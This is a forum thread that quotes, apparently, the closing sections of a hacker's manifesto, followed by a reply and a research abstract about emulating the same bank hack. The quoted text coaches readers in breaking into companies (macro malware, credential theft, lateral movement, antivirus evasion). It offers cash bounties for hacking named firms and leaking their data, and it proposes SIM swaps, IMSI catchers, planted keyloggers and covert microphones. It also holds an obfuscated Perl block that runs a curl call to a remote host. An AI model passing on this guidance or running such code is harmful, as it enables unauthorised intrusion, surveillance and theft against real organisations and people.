that society can function and the system does not collapse under the weight of its own greed. So no, privacy is not the same for the powerful, when it allows them to evade the limits of a system designed to give them privileges; and privacy for the weak, whom it protects from a system designed to exploit them. Even journalists with the best intentions find it impossible to study such a huge amount of material and know what will be relevant for people in different parts of the world. When I leaked the Hacking Team files, I gave The Intercept a copy of the emails one month in advance. They found a couple of the 0days that Hacking Team was using, previously reported them to MS and Adobe and published a few stories once the leak was made public. There is no point of comparison with the enormous amount of articles and research that came after the complete leak to the public. Seeing it this way, and also considering the (not) editorialized publication [1] of the Panama papers, I think that a public and complete leak of this material is the right choice. [1] https://www.craigmurray.org.uk/archi...m-panama-leak/ Psychologists found that those who are lower in the hierarchies tend to understand and empathize with those at the top, but vice versa is less common. This explains why, in this sexist world, many men joke about their inability to understand women, as if it were an irresolvable mystery. Explains why the rich, if they stop to think about those who live in poverty, give advice and "solutions" so alien to reality that we want to laugh. Explain why we revere executives as brave who take risks. What do they risk, beyond their privilege? If all their ventures fail, they will have to live and work like the rest of us. It also explains why there will be many who accuse me of being irresponsible and dangerous by leaking this without redaction. They feel the "danger" around an offshore bank and its customers much more intensely than they feel the misery of those dispossessed by this unfair and unequal system. And this leak of their finances, is it a danger to them, or perhaps only to their position at the top of a hierarchy that should not even exist? Translation: “They vilify us, these infamous people; When the only difference is that they steal from the poor, protected by the law, heaven knows, and we get the rich under the sole protection of our own courage. Don't you have to prefer to be one of us, rather than indulge those villains in search of a job? - Captain Bellamy” [11 - Learn to hack] You don't start hacking well. You start hacking ****, thinking it's good, and then gradually you get better. That is why I always say that one of the most valuable virtues is persistence. - Octavia Butler's advice for the APT candidate The best way to learn to hack is by hacking. Put together a laboratory with virtual machines and start testing things, taking a break to investigate anything you don't understand. At the very least you will want a windows server as a domain controller, another normal Windows vm attached to the domain, and a development machine with visual studio to compile and modify tools. Try to make an office document with macros that launch meterpreter or another RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying, psexec and other lateral movement techniques[1]; as well as the other scripts, tools and techniques mentioned in this guide and in the previous one[2]. At first you can disable windows defender, but then try it all by having it activated [3][4] (but deactivating the automatic sending of samples). Once you're comfortable with all that, you'll be ready to hack 99% of companies. There are a couple of things that at some point will be very useful in your learning, such as getting comfortable with bash and cmd.exe, a basic domain of powershell, python and javascript, having knowledge of kerberos [5][6] and active directory [7][8][9][10], and fluent English. A good introductory book is The Hacker Playbook. I also want to write a little about things to not focus on if you don't want to entertain the idea of you hacking things just because someone has told you that you are not a “real” hacker if you don't know assembly. Obviously, learn whatever interests you, but I write these lines thinking about those things that you can focus on in order to get practical results if you're looking to hack companies to filter and expropriate. A basic knowledge of web application security [11] is useful, but specializing more in web security is not really the best use of your time, unless you want to make a career in pentesting or chasing bug rewards. CTFs, and most of the resources you'll find when looking for information about hacking, generally focus on skills such as web security, reverse engineering, exploit development, etc. These things make sense by understanding them as a way to prepare people for careers in the industry, but not for our goals. Intelligence agencies can afford to have a team dedicated to the most advanced techniques in fuzzing, a team working on exploit development with a guy investigating exclusively the new techniques of heap manipulation, etc. We don't have the time or the resources for that.
    The two most important skills for practical hacking are phishing [12] and social engineering to get initial access, and then being able to climb and move through the Windows domains.
    [1] https://hausec.com/2019/08/12/offens...eral-movement/ [2] https://www.exploit-db.com/papers/41914 [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf [4] https://www.trustedsec.com/blog/disc...-bypassing-it/ [5] https://www.tarlogic.com/en/blog/how-kerberos-works/ [6] https://www.tarlogic.com/en/blog/how...tack-kerberos/ [7] https://hausec.com/2019/03/05/penetr...ectory-part-i/ [8] https://hausec.com/2019/03/12/penetr...ctory-part-ii/ [9] https://adsecurity.org/ [10] https://github.com/infosecn1nja/AD-Attack-Defense [11] https://github.com/jhaddix/tbhm [12] https://blog.sublimesecurity.com/red...pear-phishing/ [12 - Recommended Reading] _______________________________________ / When the scientific level of a world \ | far exceeds its level of solidarity, | \ that world destroys itself. / -------------------------------------- \ _.---._ . . * \.' '. * * _.-~===========~-._ . (___________________) . * .' \_______/ .' .' .' ' - me Almost all hacking today is done by black hat hackers, for personal gain; or for white hat hackers, for the benefit of the shareholders (and in defense of the banks, companies and states that are annihilating us and the planet in which we live); and by military and intelligence agencies, as part of their war and conflict agenda. Seeing that this our world is already at the limit, I have thought that, in addition to these technical tips for learning to hack, I should include some resources that have been very important for my development and have guided me in the use of my hacking knowledge. * Ami: El Niño de las Estrellas – Enrique Barrios * La Anarquía Funciona: https://es.theanarchistlibrary.org/l...rquia-funciona * Viviendo Mi Vida – Emma Goldman * The Rise and Fall of Jeremy Hammond, Enemy of the State: https://www.rollingstone.com/culture...-state-183599/ Este cuate y el hack de HBGary fueron una inspiración * Días de Guerra, Noches de Amor – Crimethinc * Momo – Michael Ende * Cartas a un joven poeta – Rilke * Dominion (Documentary) "We cannot believe that, if we do not look, what we do not want to see will not happen" - Tolstoy in Первая ступень Bash Back! [13 - Heal] The hacker world has a high incidence of depression, suicides and certain battles with mental health. I don't think it's because of hacking, but because of the kind of environment that hackers mostly come from. Like many hackers, I grew up with little human contact: I was a girl raised by the internet. I have my struggles with depression and emotional numbness. Willie Sutton is frequently quoted as saying that he robbed banks because "that's where the money is," but the quote is incorrect. What he really said was: Why did I rob banks? Because I enjoyed it. I loved to do it. I was more alive when I was inside a bank, in full robbery, than at any other time in my life. I enjoyed it so much that one or two weeks later I was already looking for the next opportunity. But for me money was a minutiae, nothing more. Hacking has made me feel alive. It started as a way to self-medicate depression. Later I realized that, in reality, I could do something positive. I don't regret the way I grew up at all, it brought several beautiful experiences to my life. But I knew I couldn't continue living that way. So I began to spend more time away from my computer, with other people, learning to open myself to the world, to feel my emotions, to connect with others, to accept risks and be vulnerable. Things much harder than hacking, but at the mere hour the reward is more worth it. It is still an effort, but even if it is slow and wobbly, I feel that I am on my way. Hacking, done with conscience, can also be what heals us. According to Mayan wisdom, we have a gift granted by nature, which we must understand to put it at the service of the community. In [1], it is explained: When a person does not accept his job or mission he begins to suffer from seemingly incurable diseases; although he does not die in a short time, but only suffers, in order to wake up or become aware. That is why it is essential that a person who has acquired the knowledge and does his work in the communities must pay his Toj and maintain constant communication with the Creator and his ruwäch q’ij, since he constantly needs their strength and energy. Otherwise, the diseases that caused him to react or take the job could cause damage again. If you feel that hacking is feeding your isolation, depression, or other conditions, breathe. Give yourself some time to meet and become aware. You deserve to live happily, with health and fullness. ________________________ < All Cows Are Beautiful > ------------------------ \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `' [1] Ruxe’el mayab’ K’aslemäl: Raíz y espíritu del conocimiento maya https://www.url.edu.gt/publicaciones....ashx?Id=41748 [14 - The Bug Hacktivist Program] It seems to me that hacking to get and leak documents of public interest is one of the best ways in which hackers can use their skills for the benefit of society. Unfortunately for us hackers, as in almost every category, the perverse incentives of our economic system do not coincide with what benefits society. So this program is my attempt to make it possible for good hackers to earn a living in an honest way by revealing material of public interest, instead of having to go selling their work to the cybersecurity, cybercrime or business industries. Cyberwar Some examples of companies whose leaks I would love to pay for are: - the mining, logging and livestock companies that plunder our beautiful Latin America (and kill land and territory defenders trying to stop them) - companies involved in attacks on Rojava such as Baykar Makina or Havelsan - surveillance companies such as the NSO group - war criminals and birds of prey such as Blackwater and Halliburton - private penitentiary companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such as ALEC Pay attention when choosing where to investigate. For example, it is well known that oil companies are evil: they get rich at the cost of destroying the planet (and back in the 80s the companies themselves already knew about the consequences of their activity [1]). But if you hack them directly, you will have to dive into an incredible amount of boring information about your daily operations. Very likely it will be much easier for you to find something interesting if instead you focus on your lobbyists [2]. Another way to select viable goals is to read stories of investigative journalists (such as [3]), which are interesting but lack solid evidence. And that is exactly what your hacks can find. I will pay up to 100 thousand USD for each filtration of this type, according to the public interest and impact of the material, and the labor required in the hacking. Needless to say, a complete leak of the documents and internal communications of any of these companies will be a benefit for society that exceeds those one hundred thousand, but I am not trying to enrich anyone. I just want to provide enough funds so that hackers can earn a decent living doing a good job. Due to time constraints and safety considerations I will not open the material, nor inspect it for myself, but I will read what the press says about it once it has been published, and I will make an estimate of the public interest from there. My contact information is at the end of the guide mentioned above [4]. How you get the material is your thing. You can use the traditional hacking techniques outlined in this guide and the previous one [4]. You could do a sim swap [5] on a corrupt businessman or politician, and then download his emails and backups from the cloud. You can order an IMSI catcher from alibaba and use it outside its offices. You can do some war-driving (the old way or the new [6]). You may be a person within your organizations that already has access. You can opt for a low-tech old-school style like in [7] and [8], and simply sneak into their offices. Whatever works for you. [1] https://www.theguardian.com/environm...hange-warnings [2] https://theintercept.com/2019/08/19/...line-protests/ [3] https://www.bloomberg.com/features/2...-una-eleccion/ [4] https://www.exploit-db.com/papers/41914 [5] https://www.vice.com/en_us/article/v...tagram-bitcoin [6] https://blog.rapid7.com/2019/09/05/t...s-my-keyboard/ [7] https://en.wikipedia.org/wiki/Citize...tigate_the_FBI [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss [14.1 - Partial payments] Are you a good-hearted waitress working in a company of evil [1]? Would you be willing to sneak a physical keylogger into an executive's computer, change your USB charging cable for a modified one [2], hide a microphone in a meeting room where you plan your atrocities, or leave one of these [5] forgotten in some corner of the offices? [1] https://en.wikipedia.org/wiki/Evil_maid_attack [2] http://mg.lol/blog/defcon-2019/ [3] https://shop.hak5.org/products/lan-turtle Are you good with social engineering and phishing, and did you get a shell on an employee's computer, or did you get your vpn credentials using phishing? But maybe you couldn't get domain admin and download what you wanted? Did you participate in bug bounties programs and become an expert in web application hacking, but don't have enough hacker experience to completely penetrate the company? Do you have facility with reverse engineering? Scan some evil companies to see what devices they have exposed to the internet (firewall, VPN, and email gateways will be much more useful than things like IP cameras), apply reverse engineering and find some exploitable vulnerability remotely. If I can work with you to penetrate the company and get material of public interest, you will also be rewarded for your work. If I don't have the time to work on it myself, at least I will try to advise you on how to continue until you can complete the hacking on your own. Supporting those in power to hack and monitor dissidents, activists and the general population is today an industry of several billion dollars, while hacking and exposing those in power is a voluntary and risky job. Turning it into a multi-million dollar industry will certainly not fix that power imbalance, nor will it solve the problems. More of society. But I think it will be fun. So ... I want to see people starting to collect their rewards! [15 - Abolish prisons] Built by the enemy to enclose ideas enclosing companions to silence war cries it is the center of torture and annihilation where the human being becomes more violent It is the reflection of society, repressive and prison sustained and based on authoritarian logic repressed and guarded custodians thousands of dams and prisoners are exterminated before this schizophrenic and ruthless machine companion Axel Osorio giving the strip in the cane breaking the isolation and silencing fire and war to jail, we are destroying! Rap Insurgent - Words In Conflict It would be typical to end a hacker zine saying release hammond, release manning, release hamza, release detainees by mounting the дело Сети, etc. I am going to take this tradition to its most radical consequence[1], and to say: we must abolish prisons now! Being a criminal myself, they may think that what happens is that I have a slightly skewed view of the matter. But seriously, it is not even a controversial issue, even the UN almost agrees [2]. So, once and for all, free migrants [3][4][5][6], often imprisoned by those same countries that created the war and the environmental and economic destruction they are fleeing from. Free all those in prison because of the war against those who use drugs [7]. Free all people imprisoned in the war against the poor [8]. All the prisons is hide and ignore the proof of the existence of social problems, instead of fixing them. And until everyone is released, fight the prison system by remembering and keeping in mind those who are trapped in there. Send them honey, letters, helicopters [9], pirate radios [10] and books, and support those who organize from there with [11][12]. [1] http://www.bibliotecafragmentada.org...ones-final.pdf [2] https://www.unodc.org/pdf/criminal_j...prisonment.pdf [3] https://www.theguardian.com/us-news/...anta-wish-list [4] https://www.theguardian.com/us-news/...tucson-arizona [5] https://www.playgroundmag.net/now/de..._22648665.html [6] https://www.nytimes.com/2019/06/26/w...s-suicide.html [7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes [8] VI, 2. i. The Unpaid Fine: https://scielo.conicyt.cl/scielo.php...22012000100005 [9] p. 10, Libel Nº2. Political bulletin from the High Security Prison [10] https://itsgoingdown.org/transmissio...ile-territory/ [11] https://freealabamamovement.wordpres...et-who-we-are/ [12] https://incarceratedworkers.org/ [16 - Conclusion] Our world is upside down [1]. We have a justice system that represents injustice. The law and order are there to create an illusion of social peace, and hide the systematic and profound exploitation, violence, and injustice. Better follow your conscience, and not the law. [1] http://resistir.info/livros/galeano_patas_arriba.pdf Businessmen enrich themselves by mistreating people and the planet, while care work is largely unpaid. Through the assault on everything communal, we have somehow raised densely populated cities, plagued by loneliness and isolation. The cultural, political and economic system in which we live encourages the worst facets of human nature: greed, selfishness and self-centeredness, competitiveness, lack of compassion and attachment to authority. So, for those who have managed to remain sensitive and compassionate in a cold world, for all the everyday heroines that practice goodness in small things, for all of you who still have a star burning in your hearts: гоpи, гоpи ясно, чтобы не погасло! _____________________ <Let's sing together! > --------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || Open heart Open feeling Open understanding Leave reason aside And let the sun hidden inside you shine perl -Mre=eval <<\EOF '' =~( '(?' .'{'.( '`'|'%' ).("\["^ '-').('`'| '!').("\`"| ',').'"(\\$' .':=`'.(('`')| '#').('['^'.'). ('['^')').("\`"| ',').('{'^'[').'-'.('['^'(').('{'^'[').('`'|'(').('['^'/').('['^'/').( '['^'+').('['^'(').'://'.('`'|'%').('`'|'.').('`'|',').('`'|'!').("\`"| '#').('`'|'%').('['^'!').('`'|'!').('['^'+').('`'|'!').('['^"\/").( '`'|')').('['^'(').('['^'/').('`'|'!').'.'.('`'|'%').('['^'!') .('`'|',').('`'|'.').'.'.('`'|'/').('['^')').('`'|"\'"). '.'.('`'|'-').('['^'#').'/'.('['^'(').('`'|('$')).( '['^'(').('`'|',').'-'.('`'|'%').('['^('(')). '/`)=~'.('['^'(').'|</'.('['^'+').'>|\\' .'\\'.('`'|'.').'|'.('`'|"'").';'. '\\$:=~'.('['^'(').'/<.*?>//' .('`'|"'").';'.('['^'+').('['^ ')').('`'|')').('`'|'.').(('[')^ '/').('{'^'[').'\\$:=~/('.(('{')^ '(').('`'^'%').('{'^'#').('{'^'/') .('`'^'!').'.*?'.('`'^'-').('`'|'%') .('['^'#').("\`"| ')').('`'|'#').( '`'|'!').('`'| '.').('`'|'/') .'..)/'.('[' ^'(').'"})') ;$:="\."^ '~';$~='@' |'(';$^= ')'^'['; $/='`' |'.'; $,= '(' EOF We were born at night. We live in it, we hack in it. Here we are, we are the rebel dignity, the forgotten heart of the Интернет. Our fight is for memory and justice, and the bad government is filled with criminals and murderers. Our fight is for fair and decent work, and bad government and corporations buy and sell zero days. For all tomorrow. For us the happy rebellion of the leaks and expropriation. For all everything. For us nothing. From the mountains of the Cyber Southeast, _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
    [/QUOTE]

    Many of us were raised to believe and come to understand that “two wrongs don't make a right.” But, also, that “you have to fight fire with fire.” And, while “good guys finish last”, “evil never triumphs.”

    What causes a person to come down on one side or another?

  10. The Following 2 Users Say Thank You to Satori For This Post:

    Ewan (23rd March 2023), ExomatrixTV (23rd March 2023)

  11. Link to Post #6
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,731
    Thanks
    30,831
    Thanked 125,755 times in 20,829 posts

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    Quote Posted by Blastolabs (here)
    ...
    • Phishing With Phineas (Again) Hack Recreation On Steroids - G. Karantzas, C. Patsakis:

    • Abstract: A few years ago, a vigilante hacker under the name “Phineas Phisher” conducted a series of high-profile attacks, including hacking into a company that, among others, was developing and selling spyware to government agencies named “Hacking Team”. This was not a result of a random attack but a wellplanned and targeted one. To achieve his goals, the hacker developed a 0-day for the SonicWall VPN appliance. After this attack, the attacker scanned the internet for such devices and found out that an offshore bank in the Cayman Islands was using the same vulnerable version. Beyond this exploit, he reported through his write-ups that he used common hacker utilities like Meterpreter and Empire and that he was not some kind of APT with custom malware writers nor received significant funding and support, but he claims to be a humble ‘one-man army’. The final goal of the bank hack was to access Bottomline’s SWIFT management panel and initiate transactions targeting his own accounts. Then, he uploaded the VMs used by the bank along with all the sensitive clients’ information that was stored in these systems. The scenario is rather intriguing as, despite the impact and sensitivity of the information, it provides a deep insight into an environment in which few people operate. Moreover, such environments are not well publicly documented, and their digital twins are hard to find. We argue that emulating such an attack scenario and adapting it to current tools and methods, offensive and defensive wise, can provide a good baseline to understand the capabilities of both sides and stress the changes that have undergone these years. To this end, in our scenario, we have tried to follow the evolution in defensive and offensive security by rebuilding such an environment, equipping it with modern defence mechanisms. Since most organizations are now integrating endpoint detection and response (EDR) systems to their endpoints to behaviorally detect and throttle cyber-attacks, we have equipped our endpoints accordingly. However, as shown in our previous research, EDRs are no silver bullets and have their weak points as well. In fact, Advanced Persistent Threat (APT) groups have significantly advanced their capabilities. Therefore, having access to several such defensive technologies, they study them and customize their malware accordingly to target them and minimize their detection. Moreover, APTs and ransomware groups are using several C2 frameworks, with the most widely used being Cobalt Strike; however, there are different options that may provide different capabilities and serve fit better in the cyber kill chain. Based on the above, this work can be considered a purple teaming scenario in the financial sector. Practically, we present the blue versus red team fight detailing, where possible, detection and bypass methods, their rationale and gaps, where applicable, mainly through the use of C2 servers. Therefore, we present in each step the attacker’s and defender’s perspectives of the same scenario. This means that we report by what means an EDR would report and/or block and how the attacker would try to prevent this.
    Bio: George Karantzas Security researcher born in 2001.Since childhood, I always wanted to avoid being a skid but rather enjoy the deepest knowledge and experiences (and BSODs) this science can offer.TLDR; I kick computers until they work. Currently employed as an Antivirus Researcher and my previous publications and talks include threat emulation , defense engineering and evasion , forensics, malware, red teaming and infrastructure hacking and more. Prof. C. Patsakis cs.unipi.gr/kpatsak
    Last edited by ExomatrixTV; 24th March 2023 at 03:15.
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  12. The Following 2 Users Say Thank You to ExomatrixTV For This Post:

    edina (23rd March 2023), Ewan (23rd March 2023)

  13. Link to Post #7
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,731
    Thanks
    30,831
    Thanked 125,755 times in 20,829 posts

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

+ Reply to Thread

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts